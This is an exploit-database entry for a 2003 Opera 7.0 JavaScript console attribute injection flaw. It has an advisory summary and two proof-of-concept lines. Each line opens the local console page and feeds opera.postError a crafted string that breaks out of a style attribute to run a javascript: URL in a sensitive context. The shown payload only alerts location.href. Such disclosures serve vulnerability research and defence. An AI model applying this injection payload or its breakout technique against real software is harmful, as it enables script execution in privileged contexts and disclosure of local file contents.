Opera 7.0 - JavaScript Console Attribute Injection

Author: GreyMagic Software
type: remote
platform: windows
port: 
date_added: 2003-02-04 
date_updated: 2012-10-24 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/6755/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

open("file://localhost/console.html","","");
opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\"");

open("file://localhost/console.html","","");
opera.postError("file://\"style=\"background-image:url('javascript:alert(location.href)')\".");